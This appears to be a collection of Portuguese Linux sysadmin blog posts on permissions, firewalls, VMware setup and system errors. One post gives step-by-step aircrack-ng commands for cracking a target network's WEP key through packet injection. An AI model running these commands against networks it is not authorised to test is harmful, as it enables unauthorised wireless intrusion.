0 = nenhuma operação permitida
1 = permite execução de um arquivo ou acesso a uma pasta 
2 = permite escrever/alterar um arquivo/pasta
4 = permite apenas leitura

Todo arquivo tem permissão para o dono(owner), para o grupo(group) e para outros[world(são aqueles que não são o dono(claro) e não estão no grupo)].

Para definir as permissões que você quer para o arquivo/pasta, devemos somar os bits que você quer para cada classe.

Exemplos:

#1 Seu diretório “home” terá por padrão a permissão 711.

7 = 4 + 2 + 1 - você (o dono) pode ler/escrever/executar
1 = 1 - o grupo pode executar/acessar diretorio, mas nao podem ler nem escrever.
1 = 1 - outros podem executar/acessar diretorio, mas nao podem ler nem escrever.

#2 Seu diretório da web terá permissões 755:

7 = 4 + 2 + 1 - você (o dono) pode ler/escrever/executar
5 = 4 + 1 - o grupo pode executar/acessar diretorio/ler, mas nao pode escrever.
5 = 4 + 1 - outros podem executar/acessar diretorio/ler, mas nao pode escrever.

Tudo muito simples, você só precisa somar os números conforme a permissão necessária.

Há também uma outra maneira de se dar permissão usando o chmod, que algumas pessoas dizem ser mais simples e só fazem uso da mesma. Vejo as duas como simples.

É o seguinte, ao invés dos números usaremos “letras”.

Para definir qual o tipo de pessoa que irá ter permissão, utilizaremos as seguintes:

"u" - para dono (owner)
"g" - para groupo (group)
"o" - para outros (others)
"a" - para todos (all) 

Os operadores serão:

"+" - para adicionar 
"-" - para remover
"=" - define para todos, todas as permissões que o arquivo/pasta terão.
Caso não seja definido nenhum valor, ele apagará todas as permissões.
obs: Mesmo que coloque =rwx(sem definir usuario)ele nunca dará permissão
de escrita para grupo e outros, só para o dono.

As permissões são:

"r" - para leitura(read)
"w" - para escrita(write)
"x" - para execução(execute)

Seguem alguns exemplos:

chmod u=rx arquivo - Da permissão de leitura e execução para o dono
chmod go-r arquivo - Retira permissão de leitura do groupo e dos outros
chmod g+w arquivo - Adiciona permissão de escrita para o grupo
chmod a+x arquivo1 arquivo2 - Adiciona permissão de execução para todos
chmod g+rx,o+x arquivo - Adiciona permissão para o grupo de leitura e
execução e para outros apenas execução

Bem, estão ai as duas maneiras possíveis, cabe agora a vocês escolherem a melhor! Lembrando sempre que isso é apenas o “básico” caso queria entender melhor o chmod use o man.

"cannot find name for user ID xxx"
ou
"cannot find name for group ID xxx"

Pode ter dois motivos:
#1 – Ser devido a um problema de permissão no /etc/passwd ou /etc/group files.  Para solucionar, usaremos os seguintes comandos:

chmod 644 /etc/passwd
chmod 644 /etc/group

#2 – A pasta /usr/sbin não está no seu “path”. A solução nesse caso e a mais recomendada é usar o caminho completo:

Como root deletamos o usuário já criado:
userdel <usuário>

Então criamos o usuário novamente utilizando o caminho completo:
/usr/sbin/useradd <usuário>

Estão ai duas soluções simples, para esse problema chato.  Lembrando que a segunda opção é a ideal para manter a segurança do seu ambiente.

Video demonstrativo de como quebrar uma chave WEP (nesse caso 40-bits, mas funcionaria para 104-bits).

Comandos:
0:42 apt-get install aircrack-ng
1:06 iwconfig
1:22 airmon-ng start wlan0
1:30 ifconfig
1:35 ifconfig mon0
1:43 airodump-ng mon0
2:05 airodump-ng –channel 6 –bssid XX:XX:XX:XX:XX:XX -w wep1 mon0
2:33 sudo su
2:43 ifconfig wlan0
2:50 aireplay-ng -1 0 -e YYYY -a XX:XX:XX:XX:XX:XX -h ZZ:ZZ:ZZ:ZZ:ZZ:ZZ mon0
3:17 aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h ZZ:ZZ:ZZ:ZZ:ZZ:ZZ mon0
4:04 sudo su
4:13 aireplay-ng -1 0 -e YYYY -a XX:XX:XX:XX:XX:XX -h ZZ:ZZ:ZZ:ZZ:ZZ:ZZ mon0
4:26 ls -lah wep1-01.cap
4:35 aircrack-ng -b XX:XX:XX:XX:XX:XX wep1-01.cap

XX:XX:XX:XX:XX:XX = BSSID da rede alvo (obtido pelo airodump-ng)
YYYY = nome da rede alvo (obtido pelo airodump-ng)
ZZ:ZZ:ZZ:ZZ:ZZ:ZZ:ZZ = MAC address da interface de rede que usamos para injetar os pacotes (nesse caso: wlan0)

UPDATE (23/10/2011):

aireplay-ng: Wouldn’t false authenticate OR deauth = mon0 is on channel -1, but the AP uses channel X

Se voce estiver tendo problema com “channel -1″, de uma olhada nesse tutorial:

http://www.hack.net.br/blog/hacking/aircrack-ng-mon0-is-on-channel-1-but-the-ap-uses-channel-x/

Para descobrir a versão do Kernel, é padrão em todas as distribuições então é só digitar no console:

# uname -a

Teremos como resultado algo do tipo:

Linux 2.6.18-164.10.1.el5 #1 SMP Thu Jan 7 20:00:41 EST 2010 i686 athlon i386 GNU/Linux

O resultado vai variar conforme a versão instalada e o hardware.

Para descobrir a versão do Linux instalada, para cada distribuição teremos uma particularidade. Vejamos:

Para baseadas em RedHat e Debian:

# cat /etc/issue

Para Slackware:

# cat /etc/slackware-version

O download pode ser feito no endereço: http://www.google.com/chrome?platform=linux

No endereço você encontra versões RPM e DEB para Fedora, Ubuntu, Debian e OpenSUSE.

Já estou usando há uma semana e parece bem estável e bem mais rápido que o Firefox para Linux.

Erro de I/O, um erro não muito comum de se ver, mas, pode acontecer quando menos se espera, aumentando as chances se os discos estiverem com mais de 4 anos de uso continuo ( isso não descarta a possibilidade de acontecer com um disco novo ).

Quando isso ocorre, você pode estar local ou remotamente e o disco falhar você não terá mais acesso aos programas que estao em disco, nem mesmo poderá executar nenhum comando inclusive os para reiniciar ou desligar a máquina. Nesse caso você receberá mensagens de erro de I/O.

# reboot
bash: /sbin/reboot: Input/output error
# shutdown -r now
bash: /sbin/shutdown: Input/output error

Temos duas situações aqui com soluções diferentes.

A primeira é, se você souber que o problema que está acontecendo pode ser porque o sistema foi corrompido devido a um boot repentino, podemos executar os seguintes comandos abaixo, que iremos envia-las diretamente para o kernel usando a interface do /proc:

# ativa o suporte as teclas máquinas

echo 1 > /proc/sys/kernel/sysrq

# Envia o código do comando que será executado, no caso reBoot.

echo b > /proc/sysrq-trigger

Caso esteja local mas não tenha acesso a máquina para pressionar o “power” pode pressionar no teclado a tecla SysRq após digitar o primeiro comando.

A segunda seria um problema de disco falhando devido algum problema físico ou mesmo de tempo de uso, a solução acima será inválida uma vez que a unica solução nesse caso é a substituição do disco defeituoso por um novo.

OBS: Em breve estarei publicando um post explicando como usar o fsck para reparar o disco com um erro lógico.

Preparando o Ambiente

Baixe o VMware Server 2.0.2 em http://www.vmware.com/download/server/getserver.html (é necessário cadastro).

OBS: O VMware Server é um produto grátis, com apenas um cadastro a serial é mostrada na página de download.

Copie o arquivo baixado para seu servidor (usando SFTP por exempl0).

Instalando Pacotes Necessários

Como o VMware Server não possui os módulos já compilados para o kernel padrão do Debian Lenny, em sua instalação, será requisitado que instale os programas de compilação (make, gcc, …) e os cabeçalhos do kernel (linux-headers), portanto vamos instalá-los:

apt-get install build-essentials gcc-4.1

apt-get install linux-headers-`uname -r`

O Debian por padrão instala o gcc-4.1 e 4.3, porém ele deixa o 4.3 como padrão, precisamos mudar para o 4.1 para o VMware não reclamar:

rm -fr /usr/bin/gcc

(não se assuste, é só um link)

ln -s /usr/bin/gcc-4.1 /usr/bin/gcc

Pronto, o sistema está pronto para a compilação.

Descompacte o arquivo com o comando:

tar xzvpf VMware-server-2.0.2-203138.i386.tar.gz

Entre no diretório criado:

cd vmware-server-distrib

Execute o instalador:

./vmware-install.pl

Nessa etapa você pode deixar os valores padrão e dar enter em tudo, exceto na última pergunta, no qual ele pergunta se deve executar o vmware-config.pl para você, você deve responder “no”.

Se você já executou o vmware-config.pl, tecle CTRL+C para cancelar, pois precisamos corrigir esse script antes de continuarmos.

Corrigindo o vmware-config.pl

Atenção: Essa correção é para Debian 5.0.3 (Lenny) caso você utilize outra versão, pule esse passo e tente executar o vmware-config.pl original (explicado no próximo tópico), somente tente corrigir o vmware-config caso tenha o problema mostrado abaixo.

Essa correção é necessária para evitar o seguinte erro após compilar o módulo vsock:

Para evitar, crie um arquivo chamado  /root/vmware-config.patch, com o conteúdo:

--- /usr/bin/vmware-config.pl.orig    2008-11-28 12:06:35.641054086 +0100
+++ /usr/bin/vmware-config.pl    2008-11-28 12:30:38.593304082 +0100
@@ -4121,6 +4121,11 @@
 return 'no';
 }

+  if ($name eq 'vsock') {
+    print wrap("VMWare config patch VSOCK!n");
+    system(shell_string($gHelper{'mv'}) . ' -vi ' . shell_string($build_dir . '/../Module.symvers') . ' ' . shell_string($build_dir . '/vsock-only/' ));
+  }
+
 print wrap('Building the ' . $name . ' module.' . "nn", 0);
 if (system(shell_string($gHelper{'make'}) . ' -C '
 . shell_string($build_dir . '/' . $name . '-only')
@@ -4143,6 +4148,10 @@
 if (try_module($name, $build_dir . '/' . $name . '.o', 0, 1)) {
 print wrap('The ' . $name . ' module loads perfectly into the running kernel.'
 . "nn", 0);
+      if ($name eq 'vmci') {
+    print wrap("VMWare config patch VMCI!n");
+    system(shell_string($gHelper{'cp'}) . ' -vi ' . shell_string($build_dir.'/vmci-only/Module.symvers') . ' ' . shell_string($build_dir . '/../'));
+      }
 remove_tmp_dir($build_dir);
 return 'yes';
 }

Depois execute o comando:

patch /usr/bin/vmware-config.pl /root/vmware-config.patch

Pronto! Seu vmware-config.pl está corrigido.

Configurando o VMware

Execute o vmware-config:

vmware-config.pl

Agora é só sair dando enter, para que os módulos do kernel sejam compilados.

Se tudo ocorrer certo, você será perguntado para configurar a placa de rede, só precisa ter cuidado em dizer qual a placa de rede estará em modo bridge, geralmente “eth0″, mas caso utilize outra placa para o VMware, não esqueça de informar ao configurador quando perguntado.

Outra pergunta que deve-se ter cuidado é a seguinte:

The current administrative user for VMware Server  is ''.  Would you like
to specify a different administrator? [no] yes

Please specify the user whom you wish to be the VMware Server administrator
[] root

É perguntado se quer mudar o usuário administrativo do VMware, deve-se responder yes e em seguida root ou um outro usuário de sua escolha.

Depois somos perguntados sobre a serial do VMware:

Do you want to enter a serial number now? (yes/no/help)

Responda que sim (yes) e entre com a serial que você vê na página de download do VMware Server.

Caso tudo ocorra bem, os processos do VMware Server serão iniciados e podemos acessar sua console web.

Após a Instalação

Para acessar a console de administração, basta abrir um navegador e digitar:

https://172.20.20.1:8333/

Troque o ip 172.20.20.1 pelo IP do seu servidor Debian.

Você irá ver a seguinte tela:

Entre o usuário root, sua senha e divirta-se!

Vamos configurar um firewall no modo padrão DROP, ou seja, ele irá bloquear todos os pacotes, e liberar apenas o que definirmos nas regras de ACCEPT abaixo.

Para tipo de firewall é necessário cuidado na hora de configurá-lo, pois podemos sem querer bloquear nossa própria conexão, se não configurarmos na ordem correta. Porém também é o modo mais seguro, por isso iremos utilizá-lo.

Regras Básicas

As regras básicas que precisamos ter em um firewall são as abaixo.

Permitir pings:

iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT

Permitir acesso a porta 22 (SSH):

iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT

Caso você possua um Apache rodando, também precisa permitir acesso a porta 80 (HTTP):

iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT

Permitir conexões que já foram estabelecidas:

iptables -A INPUT -p ALL -m state --state ESTABLISHED,RELATED -j ACCEPT

Permitir acesso loopback:

iptables -A INPUT -s 127.0.0.1 -j ACCEPT

Mas só temos liberações… como iremos impedir acessos indesejados?

iptables -P FORWARD DROP
iptables -P INPUT DROP

Mudando a política padrão das tabelas para DROP.

Atenção! Cuidado ao mudar a política com as regras acima. Se você não estiver criado as regras de liberação, o firewall irá bloquear qualquer conexão e você perderá acesso ao servidor.

Se isso acontecer…

• Reinicie o servidor; ou
• Peça para alguém ir na console, logar como root e digitar:

  • iptables -P INPUT ACCEPT

Qual a diferença entre a política DROP e REJECT?

• REJECT o trafego é rejeitado, ou seja, um pacote ICMP é enviado de volta avisando que aquela porta não está aberta.
• DROP o tráfego é descartado, sem que host de origem seja avisado.

Por que utilizar DROP então?

Eu prefiro utilizar DROP pois dessa maneira, quando um host tentar abrir uma conexão para meu servidor, os pacotes serão descartados até que ocorra um timeout no host de origem. Então um portscan por exemplo demorará muito mais para mapear todas as portas do meu servidor.

Juntando tudo

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -F
iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -A INPUT -p ALL -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -s 127.0.0.1 -j ACCEPT
iptables -P FORWARD DROP
iptables -P INPUT DROP

Você pode salvar os comandos acima em um arquivo firewall.sh e colocá-lo para executar no seu /etc/rc.local

Abrir outras portas?

Para abrir outras portas, basta colocar outras regras como essa, no final do script:

iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT

Porém alterando de 22 para a porta que você deseja abrir.

Qual o motivo de existir essa regra de estado (–state ESTABLISHED,RELATED) ?

Essa regra garante que os pacotes das conexões abertas a partir do servidor, conseguirão voltar para ele.

Por exemplo, quando o servidor faz uma consulta DNS, o pedido vai sair pelo OUTPUT do iptables (que deixamos liberado) e quando voltar, vai bater no INPUT. Se não tiver essa regra, o firewall iria descartar o pacote com as informações de DNS retornando.

Vasculhando o arquivo /var/log/message, é possivel encontrar a seguinte mensagem:

Nov 05 12:04:05 dell01 kernel: end_request: I/O error, dev fd0, sector 0
Nov 05 12:04:05 dell01 kernel: Buffer I/O error on device fd0, logical block 0

O que isso significa? E como podemos consertar?

Então, essa mensagem aparece porque o kernel não detecta o floppy instalado na máquina linux. A solução para tal problema é simples, vamos desabilitar o modulo e reiniciar.

Primeiro vamos verificar se o módulo está carregado:

# lsmod | grep -i floppy
floppy                 95465  0

Vamos abrir o arquivo /etc/modprobe.d/blacklist, pode ser usado qualquer editor de texto( eu uso o nano mas vou colocar no exemplo o vi que vem padrão em qualquer distribuição).

# vi /etc/modprobe.d/blacklist

Adicionando o nome do modulo a esse aquivo, vamos evitar que ele seja carregado pelo hotplug durante o boot.

blacklist floppy

Salvamos o arquivo, fechamos (wq! no vi para quem tiver duvida) e reiniciamos a máquina linux.

#reboot

pode ser reboot ou shutdown -r now dependendo da distribuição

Quando você conecta a um host usando SSH ou SFTP, é feita uma serie de checagens para se certificar que você está conectando ao host certo.

Uma dessas é através do DNS Reverso. Ele checa, através de um lookup, se o ip que você está conectando é o mesmo do hostname cadastrado. Se não for, você vai receber a seguinte mensagem de erro: “reverse mapping checking getaddrinfo for … POSSIBLE BREAK-IN ATTEMPT!“.

Exemplo:

[root@woldo ~]#ssh 200.15.204.15x
Address 200.15.204.15x maps to free-15x.c4b972.datatek.com.br,
but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT!
200.15.204.15x's password:
[root@fw ~]#

Bem, o login foi feito sem problema nenhum, mesmo apresentando o erro.
Verdade, porém, se você estiver acessando SSH sem a utilização de senha, no caso usando chave, você encontrará problemas.

Então como solucionar esse erro de um jeito mais simples que alterar o cadastro do DNS?
É bem simples!

Vamos editar o arquivo hosts que fica no /etc/ na maquina local e adicionar a seguinte linha:

200.15.204.15x free-15x.c4b972.datatek.com.br

Depois só salvar o arquivo e pronto!
Só fazer novamente o login que o erro não aparecera mais!